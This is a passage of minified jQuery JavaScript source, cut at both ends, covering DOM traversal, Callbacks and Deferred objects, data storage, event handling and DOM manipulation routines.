this.pushStack(j(this,e||[],!1))},not:function(e){return this.pushStack(j(this,e||[],!0))},is:function(e){return!!j(this,"string"==typeof e&&D.test(e)?w(e):e||[],!1).length}});var q,L=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;(w.fn.init=function(e,t,n){var i,o;if(!e)return this;if(n=n||q,"string"==typeof e){if(!(i="<"===e[0]&&">"===e[e.length-1]&&e.length>=3?[null,e,null]:L.exec(e))||!i[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(i[1]){if(t=t instanceof w?t[0]:t,w.merge(this,w.parseHTML(i[1],t&&t.nodeType?t.ownerDocument||t:r,!0)),A.test(i[1])&&w.isPlainObject(t))for(i in t)g(this[i])?this[i](t[i]):this.attr(i,t[i]);return this}return(o=r.getElementById(i[2]))&&(this[0]=o,this.length=1),this}return e.nodeType?(this[0]=e,this.length=1,this):g(e)?void 0!==n.ready?n.ready(e):e(w):w.makeArray(e,this)}).prototype=w.fn,q=w(r);var H=/^(?:parents|prev(?:Until|All))/,O={children:!0,contents:!0,next:!0,prev:!0};w.fn.extend({has:function(e){var t=w(e,this),n=t.length;return this.filter(function(){for(var e=0;e<n;e++)if(w.contains(this,t[e]))return!0})},closest:function(e,t){var n,r=0,i=this.length,o=[],a="string"!=typeof e&&w(e);if(!D.test(e))for(;r<i;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(n.nodeType<11&&(a?a.index(n)>-1:1===n.nodeType&&w.find.matchesSelector(n,e))){o.push(n);break}return this.pushStack(o.length>1?w.uniqueSort(o):o)},index:function(e){return e?"string"==typeof e?u.call(w(e),this[0]):u.call(this,e.jquery?e[0]:e):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){return this.pushStack(w.uniqueSort(w.merge(this.get(),w(e,t))))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function P(e,t){while((e=e[t])&&1!==e.nodeType);return e}w.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return k(e,"parentNode")},parentsUntil:function(e,t,n){return k(e,"parentNode",n)},next:function(e){return P(e,"nextSibling")},prev:function(e){return P(e,"previousSibling")},nextAll:function(e){return k(e,"nextSibling")},prevAll:function(e){return k(e,"previousSibling")},nextUntil:function(e,t,n){return k(e,"nextSibling",n)},prevUntil:function(e,t,n){return k(e,"previousSibling",n)},siblings:function(e){return S((e.parentNode||{}).firstChild,e)},children:function(e){return S(e.firstChild)},contents:function(e){return N(e,"iframe")?e.contentDocument:(N(e,"template")&&(e=e.content||e),w.merge([],e.childNodes))}},function(e,t){w.fn[e]=function(n,r){var i=w.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof r&&(i=w.filter(r,i)),this.length>1&&(O[e]||w.uniqueSort(i),H.test(e)&&i.reverse()),this.pushStack(i)}});var M=/[^\x20\t\r\n\f]+/g;function R(e){var t={};return w.each(e.match(M)||[],function(e,n){t[n]=!0}),t}w.Callbacks=function(e){e="string"==typeof e?R(e):w.extend({},e);var t,n,r,i,o=[],a=[],s=-1,u=function(){for(i=i||e.once,r=t=!0;a.length;s=-1){n=a.shift();while(++s<o.length)!1===o[s].apply(n[0],n[1])&&e.stopOnFalse&&(s=o.length,n=!1)}e.memory||(n=!1),t=!1,i&&(o=n?[]:"")},l={add:function(){return o&&(n&&!t&&(s=o.length-1,a.push(n)),function t(n){w.each(n,function(n,r){g(r)?e.unique&&l.has(r)||o.push(r):r&&r.length&&"string"!==x(r)&&t(r)})}(arguments),n&&!t&&u()),this},remove:function(){return w.each(arguments,function(e,t){var n;while((n=w.inArray(t,o,n))>-1)o.splice(n,1),n<=s&&s--}),this},has:function(e){return e?w.inArray(e,o)>-1:o.length>0},empty:function(){return o&&(o=[]),this},disable:function(){return i=a=[],o=n="",this},disabled:function(){return!o},lock:function(){return i=a=[],n||t||(o=n=""),this},locked:function(){return!!i},fireWith:function(e,n){return i||(n=[e,(n=n||[]).slice?n.slice():n],a.push(n),t||u()),this},fire:function(){return l.fireWith(this,arguments),this},fired:function(){return!!r}};return l};function I(e){return e}function W(e){throw e}function $(e,t,n,r){var i;try{e&&g(i=e.promise)?i.call(e).done(t).fail(n):e&&g(i=e.then)?i.call(e,t,n):t.apply(void 0,[e].slice(r))}catch(e){n.apply(void 0,[e])}}w.extend({Deferred:function(t){var n=[["notify","progress",w.Callbacks("memory"),w.Callbacks("memory"),2],["resolve","done",w.Callbacks("once memory"),w.Callbacks("once memory"),0,"resolved"],["reject","fail",w.Callbacks("once memory"),w.Callbacks("once memory"),1,"rejected"]],r="pending",i={state:function(){return r},always:function(){return o.done(arguments).fail(arguments),this},"catch":function(e){return i.then(null,e)},pipe:function(){var e=arguments;return w.Deferred(function(t){w.each(n,function(n,r){var i=g(e[r[4]])&&e[r[4]];o[r[1]](function(){var e=i&&i.apply(this,arguments);e&&g(e.promise)?e.promise().progress(t.notify).done(t.resolve).fail(t.reject):t[r[0]+"With"](this,i?[e]:arguments)})}),e=null}).promise()},then:function(t,r,i){var o=0;function a(t,n,r,i){return function(){var s=this,u=arguments,l=function(){var e,l;if(!(t<o)){if((e=r.apply(s,u))===n.promise())throw new TypeError("Thenable self-resolution");l=e&&("object"==typeof e||"function"==typeof e)&&e.then,g(l)?i?l.call(e,a(o,n,I,i),a(o,n,W,i)):(o++,l.call(e,a(o,n,I,i),a(o,n,W,i),a(o,n,I,n.notifyWith))):(r!==I&&(s=void 0,u=[e]),(i||n.resolveWith)(s,u))}},c=i?l:function(){try{l()}catch(e){w.Deferred.exceptionHook&&w.Deferred.exceptionHook(e,c.stackTrace),t+1>=o&&(r!==W&&(s=void 0,u=[e]),n.rejectWith(s,u))}};t?c():(w.Deferred.getStackHook&&(c.stackTrace=w.Deferred.getStackHook()),e.setTimeout(c))}}return w.Deferred(function(e){n[0][3].add(a(0,e,g(i)?i:I,e.notifyWith)),n[1][3].add(a(0,e,g(t)?t:I)),n[2][3].add(a(0,e,g(r)?r:W))}).promise()},promise:function(e){return null!=e?w.extend(e,i):i}},o={};return w.each(n,function(e,t){var a=t[2],s=t[5];i[t[1]]=a.add,s&&a.add(function(){r=s},n[3-e][2].disable,n[3-e][3].disable,n[0][2].lock,n[0][3].lock),a.add(t[3].fire),o[t[0]]=function(){return o[t[0]+"With"](this===o?void 0:this,arguments),this},o[t[0]+"With"]=a.fireWith}),i.promise(o),t&&t.call(o,o),o},when:function(e){var t=arguments.length,n=t,r=Array(n),i=o.call(arguments),a=w.Deferred(),s=function(e){return function(n){r[e]=this,i[e]=arguments.length>1?o.call(arguments):n,--t||a.resolveWith(r,i)}};if(t<=1&&($(e,a.done(s(n)).resolve,a.reject,!t),"pending"===a.state()||g(i[n]&&i[n].then)))return a.then();while(n--)$(i[n],s(n),a.reject);return a.promise()}});var B=/^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/;w.Deferred.exceptionHook=function(t,n){e.console&&e.console.warn&&t&&B.test(t.name)&&e.console.warn("jQuery.Deferred exception: "+t.message,t.stack,n)},w.readyException=function(t){e.setTimeout(function(){throw t})};var F=w.Deferred();w.fn.ready=function(e){return F.then(e)["catch"](function(e){w.readyException(e)}),this},w.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--w.readyWait:w.isReady)||(w.isReady=!0,!0!==e&&--w.readyWait>0||F.resolveWith(r,[w]))}}),w.ready.then=F.then;function _(){r.removeEventListener("DOMContentLoaded",_),e.removeEventListener("load",_),w.ready()}"complete"===r.readyState||"loading"!==r.readyState&&!r.documentElement.doScroll?e.setTimeout(w.ready):(r.addEventListener("DOMContentLoaded",_),e.addEventListener("load",_));var z=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"===x(n)){i=!0;for(s in n)z(e,t,s,n[s],!0,o,a)}else if(void 0!==r&&(i=!0,g(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(w(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},X=/^-ms-/,U=/-([a-z])/g;function V(e,t){return t.toUpperCase()}function G(e){return e.replace(X,"ms-").replace(U,V)}var Y=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function Q(){this.expando=w.expando+Q.uid++}Q.uid=1,Q.prototype={cache:function(e){var t=e[this.expando];return t||(t={},Y(e)&&(e.nodeType?e[this.expando]=t:Object.defineProperty(e,this.expando,{value:t,configurable:!0}))),t},set:function(e,t,n){var r,i=this.cache(e);if("string"==typeof t)i[G(t)]=n;else for(r in t)i[G(r)]=t[r];return i},get:function(e,t){return void 0===t?this.cache(e):e[this.expando]&&e[this.expando][G(t)]},access:function(e,t,n){return void 0===t||t&&"string"==typeof t&&void 0===n?this.get(e,t):(this.set(e,t,n),void 0!==n?n:t)},remove:function(e,t){var n,r=e[this.expando];if(void 0!==r){if(void 0!==t){n=(t=Array.isArray(t)?t.map(G):(t=G(t))in r?[t]:t.match(M)||[]).length;while(n--)delete r[t[n]]}(void 0===t||w.isEmptyObject(r))&&(e.nodeType?e[this.expando]=void 0:delete e[this.expando])}},hasData:function(e){var t=e[this.expando];return void 0!==t&&!w.isEmptyObject(t)}};var J=new Q,K=new Q,Z=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,ee=/[A-Z]/g;function te(e){return"true"===e||"false"!==e&&("null"===e?null:e===+e+""?+e:Z.test(e)?JSON.parse(e):e)}function ne(e,t,n){var r;if(void 0===n&&1===e.nodeType)if(r="data-"+t.replace(ee,"-$&").toLowerCase(),"string"==typeof(n=e.getAttribute(r))){try{n=te(n)}catch(e){}K.set(e,t,n)}else n=void 0;return n}w.extend({hasData:function(e){return K.hasData(e)||J.hasData(e)},data:function(e,t,n){return K.access(e,t,n)},removeData:function(e,t){K.remove(e,t)},_data:function(e,t,n){return J.access(e,t,n)},_removeData:function(e,t){J.remove(e,t)}}),w.fn.extend({data:function(e,t){var n,r,i,o=this[0],a=o&&o.attributes;if(void 0===e){if(this.length&&(i=K.get(o),1===o.nodeType&&!J.get(o,"hasDataAttrs"))){n=a.length;while(n--)a[n]&&0===(r=a[n].name).indexOf("data-")&&(r=G(r.slice(5)),ne(o,r,i[r]));J.set(o,"hasDataAttrs",!0)}return i}return"object"==typeof e?this.each(function(){K.set(this,e)}):z(this,function(t){var n;if(o&&void 0===t){if(void 0!==(n=K.get(o,e)))return n;if(void 0!==(n=ne(o,e)))return n}else this.each(function(){K.set(this,e,t)})},null,t,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){K.remove(this,e)})}}),w.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=J.get(e,t),n&&(!r||Array.isArray(n)?r=J.access(e,t,w.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=w.queue(e,t),r=n.length,i=n.shift(),o=w._queueHooks(e,t),a=function(){w.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return J.get(e,n)||J.access(e,n,{empty:w.Callbacks("once memory").add(function(){J.remove(e,[t+"queue",n])})})}}),w.fn.extend({queue:function(e,t){var n=2;return"string"!=typeof e&&(t=e,e="fx",n--),arguments.length<n?w.queue(this[0],e):void 0===t?this:this.each(function(){var n=w.queue(this,e,t);w._queueHooks(this,e),"fx"===e&&"inprogress"!==n[0]&&w.dequeue(this,e)})},dequeue:function(e){return this.each(function(){w.dequeue(this,e)})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,t){var n,r=1,i=w.Deferred(),o=this,a=this.length,s=function(){--r||i.resolveWith(o,[o])};"string"!=typeof e&&(t=e,e=void 0),e=e||"fx";while(a--)(n=J.get(o[a],e+"queueHooks"))&&n.empty&&(r++,n.empty.add(s));return s(),i.promise(t)}});var re=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,ie=new RegExp("^(?:([+-])=|)("+re+")([a-z%]*)$","i"),oe=["Top","Right","Bottom","Left"],ae=function(e,t){return"none"===(e=t||e).style.display||""===e.style.display&&w.contains(e.ownerDocument,e)&&"none"===w.css(e,"display")},se=function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i};function ue(e,t,n,r){var i,o,a=20,s=r?function(){return r.cur()}:function(){return w.css(e,t,"")},u=s(),l=n&&n[3]||(w.cssNumber[t]?"":"px"),c=(w.cssNumber[t]||"px"!==l&&+u)&&ie.exec(w.css(e,t));if(c&&c[3]!==l){u/=2,l=l||c[3],c=+u||1;while(a--)w.style(e,t,c+l),(1-o)*(1-(o=s()/u||.5))<=0&&(a=0),c/=o;c*=2,w.style(e,t,c+l),n=n||[]}return n&&(c=+c||+u||0,i=n[1]?c+(n[1]+1)*n[2]:+n[2],r&&(r.unit=l,r.start=c,r.end=i)),i}var le={};function ce(e){var t,n=e.ownerDocument,r=e.nodeName,i=le[r];return i||(t=n.body.appendChild(n.createElement(r)),i=w.css(t,"display"),t.parentNode.removeChild(t),"none"===i&&(i="block"),le[r]=i,i)}function fe(e,t){for(var n,r,i=[],o=0,a=e.length;o<a;o++)(r=e[o]).style&&(n=r.style.display,t?("none"===n&&(i[o]=J.get(r,"display")||null,i[o]||(r.style.display="")),""===r.style.display&&ae(r)&&(i[o]=ce(r))):"none"!==n&&(i[o]="none",J.set(r,"display",n)));for(o=0;o<a;o++)null!=i[o]&&(e[o].style.display=i[o]);return e}w.fn.extend({show:function(){return fe(this,!0)},hide:function(){return fe(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){ae(this)?w(this).show():w(this).hide()})}});var pe=/^(?:checkbox|radio)$/i,de=/<([a-z][^\/\0>\x20\t\r\n\f]+)/i,he=/^$|^module$|\/(?:java|ecma)script/i,ge={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};ge.optgroup=ge.option,ge.tbody=ge.tfoot=ge.colgroup=ge.caption=ge.thead,ge.th=ge.td;function ye(e,t){var n;return n="undefined"!=typeof e.getElementsByTagName?e.getElementsByTagName(t||"*"):"undefined"!=typeof e.querySelectorAll?e.querySelectorAll(t||"*"):[],void 0===t||t&&N(e,t)?w.merge([e],n):n}function ve(e,t){for(var n=0,r=e.length;n<r;n++)J.set(e[n],"globalEval",!t||J.get(t[n],"globalEval"))}var me=/<|&#?\w+;/;function xe(e,t,n,r,i){for(var o,a,s,u,l,c,f=t.createDocumentFragment(),p=[],d=0,h=e.length;d<h;d++)if((o=e[d])||0===o)if("object"===x(o))w.merge(p,o.nodeType?[o]:o);else if(me.test(o)){a=a||f.appendChild(t.createElement("div")),s=(de.exec(o)||["",""])[1].toLowerCase(),u=ge[s]||ge._default,a.innerHTML=u[1]+w.htmlPrefilter(o)+u[2],c=u[0];while(c--)a=a.lastChild;w.merge(p,a.childNodes),(a=f.firstChild).textContent=""}else p.push(t.createTextNode(o));f.textContent="",d=0;while(o=p[d++])if(r&&w.inArray(o,r)>-1)i&&i.push(o);else if(l=w.contains(o.ownerDocument,o),a=ye(f.appendChild(o),"script"),l&&ve(a),n){c=0;while(o=a[c++])he.test(o.type||"")&&n.push(o)}return f}!function(){var e=r.createDocumentFragment().appendChild(r.createElement("div")),t=r.createElement("input");t.setAttribute("type","radio"),t.setAttribute("checked","checked"),t.setAttribute("name","t"),e.appendChild(t),h.checkClone=e.cloneNode(!0).cloneNode(!0).lastChild.checked,e.innerHTML="<textarea>x</textarea>",h.noCloneChecked=!!e.cloneNode(!0).lastChild.defaultValue}();var be=r.documentElement,we=/^key/,Te=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,Ce=/^([^.]*)(?:\.(.+)|)/;function Ee(){return!0}function ke(){return!1}function Se(){try{return r.activeElement}catch(e){}}function De(e,t,n,r,i,o){var a,s;if("object"==typeof t){"string"!=typeof n&&(r=r||n,n=void 0);for(s in t)De(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=ke;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return w().off(e),a.apply(this,arguments)}).guid=a.guid||(a.guid=w.guid++)),e.each(function(){w.event.add(this,t,i,r,n)})}w.event={global:{},add:function(e,t,n,r,i){var o,a,s,u,l,c,f,p,d,h,g,y=J.get(e);if(y){n.handler&&(n=(o=n).handler,i=o.selector),i&&w.find.matchesSelector(be,i),n.guid||(n.guid=w.guid++),(u=y.events)||(u=y.events={}),(a=y.handle)||(a=y.handle=function(t){return"undefined"!=typeof w&&w.event.triggered!==t.type?w.event.dispatch.apply(e,arguments):void 0}),l=(t=(t||"").match(M)||[""]).length;while(l--)d=g=(s=Ce.exec(t[l])||[])[1],h=(s[2]||"").split(".").sort(),d&&(f=w.event.special[d]||{},d=(i?f.delegateType:f.bindType)||d,f=w.event.special[d]||{},c=w.extend({type:d,origType:g,data:r,handler:n,guid:n.guid,selector:i,needsContext:i&&w.expr.match.needsContext.test(i),namespace:h.join(".")},o),(p=u[d])||((p=u[d]=[]).delegateCount=0,f.setup&&!1!==f.setup.call(e,r,h,a)||e.addEventListener&&e.addEventListener(d,a)),f.add&&(f.add.call(e,c),c.handler.guid||(c.handler.guid=n.guid)),i?p.splice(p.delegateCount++,0,c):p.push(c),w.event.global[d]=!0)}},remove:function(e,t,n,r,i){var o,a,s,u,l,c,f,p,d,h,g,y=J.hasData(e)&&J.get(e);if(y&&(u=y.events)){l=(t=(t||"").match(M)||[""]).length;while(l--)if(s=Ce.exec(t[l])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){f=w.event.special[d]||{},p=u[d=(r?f.delegateType:f.bindType)||d]||[],s=s[2]&&new RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),a=o=p.length;while(o--)c=p[o],!i&&g!==c.origType||n&&n.guid!==c.guid||s&&!s.test(c.namespace)||r&&r!==c.selector&&("**"!==r||!c.selector)||(p.splice(o,1),c.selector&&p.delegateCount--,f.remove&&f.remove.call(e,c));a&&!p.length&&(f.teardown&&!1!==f.teardown.call(e,h,y.handle)||w.removeEvent(e,d,y.handle),delete u[d])}else for(d in u)w.event.remove(e,d+t[l],n,r,!0);w.isEmptyObject(u)&&J.remove(e,"handle events")}},dispatch:function(e){var t=w.event.fix(e),n,r,i,o,a,s,u=new Array(arguments.length),l=(J.get(this,"events")||{})[t.type]||[],c=w.event.special[t.type]||{};for(u[0]=t,n=1;n<arguments.length;n++)u[n]=arguments[n];if(t.delegateTarget=this,!c.preDispatch||!1!==c.preDispatch.call(this,t)){s=w.event.handlers.call(this,t,l),n=0;while((o=s[n++])&&!t.isPropagationStopped()){t.currentTarget=o.elem,r=0;while((a=o.handlers[r++])&&!t.isImmediatePropagationStopped())t.rnamespace&&!t.rnamespace.test(a.namespace)||(t.handleObj=a,t.data=a.data,void 0!==(i=((w.event.special[a.origType]||{}).handle||a.handler).apply(o.elem,u))&&!1===(t.result=i)&&(t.preventDefault(),t.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,t),t.result}},handlers:function(e,t){var n,r,i,o,a,s=[],u=t.delegateCount,l=e.target;if(u&&l.nodeType&&!("click"===e.type&&e.button>=1))for(;l!==this;l=l.parentNode||this)if(1===l.nodeType&&("click"!==e.type||!0!==l.disabled)){for(o=[],a={},n=0;n<u;n++)void 0===a[i=(r=t[n]).selector+" "]&&(a[i]=r.needsContext?w(i,this).index(l)>-1:w.find(i,this,null,[l]).length),a[i]&&o.push(r);o.length&&s.push({elem:l,handlers:o})}return l=this,u<t.length&&s.push({elem:l,handlers:t.slice(u)}),s},addProp:function(e,t){Object.defineProperty(w.Event.prototype,e,{enumerable:!0,configurable:!0,get:g(t)?function(){if(this.originalEvent)return t(this.originalEvent)}:function(){if(this.originalEvent)return this.originalEvent[e]},set:function(t){Object.defineProperty(this,e,{enumerable:!0,configurable:!0,writable:!0,value:t})}})},fix:function(e){return e[w.expando]?e:new w.Event(e)},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==Se()&&this.focus)return this.focus(),!1},delegateType:"focusin"},blur:{trigger:function(){if(this===Se()&&this.blur)return this.blur(),!1},delegateType:"focusout"},click:{trigger:function(){if("checkbox"===this.type&&this.click&&N(this,"input"))return this.click(),!1},_default:function(e){return N(e.target,"a")}},beforeunload:{postDispatch:function(e){void 0!==e.result&&e.originalEvent&&(e.originalEvent.returnValue=e.result)}}}},w.removeEvent=function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n)},w.Event=function(e,t){if(!(this instanceof w.Event))return new w.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||void 0===e.defaultPrevented&&!1===e.returnValue?Ee:ke,this.target=e.target&&3===e.target.nodeType?e.target.parentNode:e.target,this.currentTarget=e.currentTarget,this.relatedTarget=e.relatedTarget):this.type=e,t&&w.extend(this,t),this.timeStamp=e&&e.timeStamp||Date.now(),this[w.expando]=!0},w.Event.prototype={constructor:w.Event,isDefaultPrevented:ke,isPropagationStopped:ke,isImmediatePropagationStopped:ke,isSimulated:!1,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=Ee,e&&!this.isSimulated&&e.preventDefault()},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=Ee,e&&!this.isSimulated&&e.stopPropagation()},stopImmediatePropagation:function(){var e=this.originalEvent;this.isImmediatePropagationStopped=Ee,e&&!this.isSimulated&&e.stopImmediatePropagation(),this.stopPropagation()}},w.each({altKey:!0,bubbles:!0,cancelable:!0,changedTouches:!0,ctrlKey:!0,detail:!0,eventPhase:!0,metaKey:!0,pageX:!0,pageY:!0,shiftKey:!0,view:!0,"char":!0,charCode:!0,key:!0,keyCode:!0,button:!0,buttons:!0,clientX:!0,clientY:!0,offsetX:!0,offsetY:!0,pointerId:!0,pointerType:!0,screenX:!0,screenY:!0,targetTouches:!0,toElement:!0,touches:!0,which:function(e){var t=e.button;return null==e.which&&we.test(e.type)?null!=e.charCode?e.charCode:e.keyCode:!e.which&&void 0!==t&&Te.test(e.type)?1&t?1:2&t?3:4&t?2:0:e.which}},w.event.addProp),w.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(e,t){w.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return i&&(i===r||w.contains(r,i))||(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),w.fn.extend({on:function(e,t,n,r){return De(this,e,t,n,r)},one:function(e,t,n,r){return De(this,e,t,n,r,1)},off:function(e,t,n){var r,i;if(e&&e.preventDefault&&e.handleObj)return r=e.handleObj,w(e.delegateTarget).off(r.namespace?r.origType+"."+r.namespace:r.origType,r.selector,r.handler),this;if("object"==typeof e){for(i in e)this.off(i,t,e[i]);return this}return!1!==t&&"function"!=typeof t||(n=t,t=void 0),!1===n&&(n=ke),this.each(function(){w.event.remove(this,e,n,t)})}});var Ne=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi,Ae=/<script|<style|<link/i,je=/checked\s*(?:[^=]|=\s*.checked.)/i,qe=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;function Le(e,t){return N(e,"table")&&N(11!==t.nodeType?t:t.firstChild,"tr")?w(e).children("tbody")[0]||e:e}function He(e){return e.type=(null!==e.getAttribute("type"))+"/"+e.type,e}function Oe(e){return"true/"===(e.type||"").slice(0,5)?e.type=e.type.slice(5):e.removeAttribute("type"),e}function Pe(e,t){var n,r,i,o,a,s,u,l;if(1===t.nodeType){if(J.hasData(e)&&(o=J.access(e),a=J.set(t,o),l=o.events)){delete a.handle,a.events={};for(i in l)for(n=0,r=l[i].length;n<r;n++)w.event.add(t,i,l[i][n])}K.hasData(e)&&(s=K.access(e),u=w.extend({},s),K.set(t,u))}}function Me(e,t){var n=t.nodeName.toLowerCase();"input"===n&&pe.test(e.type)?t.checked=e.checked:"input"!==n&&"textarea"!==n||(t.defaultValue=e.defaultValue)}function Re(e,t,n,r){t=a.apply([],t);var i,o,s,u,l,c,f=0,p=e.length,d=p-1,y=t[0],v=g(y);if(v||p>1&&"string"==typeof y&&!h.checkClone&&je.test(y))return e.each(function(i){var o=e.eq(i);v&&(t[0]=y.call(this,i,o.html())),Re(o,t,n,r)});if(p&&(i=xe(t,e[0].ownerDocument,!1,e,r),o=i.firstChild,1===i.childNodes.length&&(i=o),o||r)){for(u=(s=w.map(ye(i,"script"),He)).length;f<p;f++)l=i,f!==d&&(l=w.clone(l,!0,!0),u&&w.merge(s,ye(l,"script"))),n.call(e[f],l,f);if(u)for(c=s[s.length-1].ownerDocument,w.map(s,Oe),f=0;f<u;f++)l=s[f],he.test(l.type||"")&&!J.access(l,"globalEval")&&w.contains(c,l)&&(l.src&&"module"!==(l.type||"").toLowerCase()?w._evalUrl&&w._evalUrl(l.src):m(l.textContent.replace(qe,""),c,l))}return e}function Ie(e,t,n){for(var r,i=t?w.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||w.cleanData(ye(r)),r.parentNode&&(n&&w.contains(r.ownerDocument,r)&&ve(ye(r,"script")),r.parentNode.removeChild(r));return e}w.extend({htmlPrefilter:function(e){return e.replace(Ne,"<$1></$2>")},clone:function(e,t,n){var r,i,o,a,s=e.cloneNode(!0),u=w.contains(e.ownerDocument,e);if(!(h.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||w.isXMLDoc(e)))for(a=ye(s),r=0,i=(o=ye(e)).length;r<i;r++)Me(o[r],a[r]);if(t)if(n)for(o=o||ye(e),a=a||ye(s),r=0,i=o.length;r<i;r++)Pe(o[r],a[r]);else Pe(e,s);return(a=ye(s,"script")).length>0&&ve(a,!u&&ye(e,"script")),s},cleanData:function(e){for(var t,n,r,i=w.event.special,o=0;void 0!==(n=e[o]);o++)if(Y(n)){if(t=n[J.expando]){if(t.events)for(r in t.events)i[r]?w.event.remove(n,r):w.removeEvent(n,r,t.handle);n[J.expando]=void 0}n[K.expando]&&(n[K.expando]=void 0)}}}),w.fn.extend({detach:function(e){return Ie(this,e,!0)},remove:function(e){return Ie(this,e)},text:function(e){return z(this,function(e){return void 0===e?w.text(this):this.empty().each(function(){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||(this.textContent=e)})},null,e,arguments.length)},append:function(){return Re(this,arguments,function(e){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||Le(this,e).appendChild(e)})},prepend:function(){return Re(this,arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Le(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return Re(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return Re(this,arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},empty:function(){for(var e,t=0;null!=(e=this[t]);t++)1===e.nodeType&&(w.cleanData(ye(e,!1)),e.textContent="");return this},clone:function(e,t){return e=null!=e&&e,t=null==t?e:t,this.map(function(){return w.clone(this,e,t)})},html:function(e){return z(this,function(e){var t=this[0]||{},n=0,r=this.length;if(void 0===e&&1===t.nodeType)return t.innerHTML;if("string"==typeof e&&!Ae.test(e)&&!ge[(de.exec(e)||["",""])[1].toLowerCase()]){e=w.htmlPrefilter(e);try{for(;n<r;n++)1===(t=this[n]||{}).nodeType&&(w.cleanData(ye(t,!1)),t.innerHTML=e);t=0}catch(e){}}t&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=[];return Re(this,arguments,function(t){var n=this.parentNode;w.inArray(this,e)<0&&(w.cleanData(ye(this)),n&&n.replaceChild(t,this))},e)}}),w.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){w.fn[e]=function(e){for(var n,r=[],i=w(e),o=i.length-1,a=0;a<=o;a++)n=a===o?this:this.clone(!0),w(i[a])[t](n),s.apply(r,n.get());return this.pushStack(r)}});var We=new RegExp("^("+re+")(?!px)[a-z%]+$","i"),$e=function(t){var n=t.ownerDocument.defaultView;return n&&n.opener||(n=e),n.getComputedStyle(t)},Be=new RegExp(oe.join("|"),"i");!function(){function t(){if(c){l.style.cssText="position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0",c.style.cssText="position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%",be.appendChild(l).appendChild(c);var t=e.getComputedStyle(c);i="1%"!==t.top,u=12===n(t.marginLeft),c.style.right="60%",s=36===n(t.right),o=36===n(t.width),c.style.position="absolute",a=36===c.offsetWidth||"absolute",be.removeChild(l),c=null}}function n(e){return Math.round(parseFloat(e))}var i,o,a,s,u,l=r.createElement("div"),c=r.createElement("div");c.style&&(c.style.backgroundClip="content-box",c.cloneNode(!0).style.backgroundClip="",h.clearCloneStyle="content-box"===c.style.backgroundClip,w.extend(h,{boxSizingReliable:function(){return t(),o},pixelBoxStyles:function(){return t(),s},pixelPosition:function(){return t(),i},reliableMarginLeft:function(){return t(),u},scrollboxSize:function(){return t(),a}}))}();function Fe(e,t,n){var 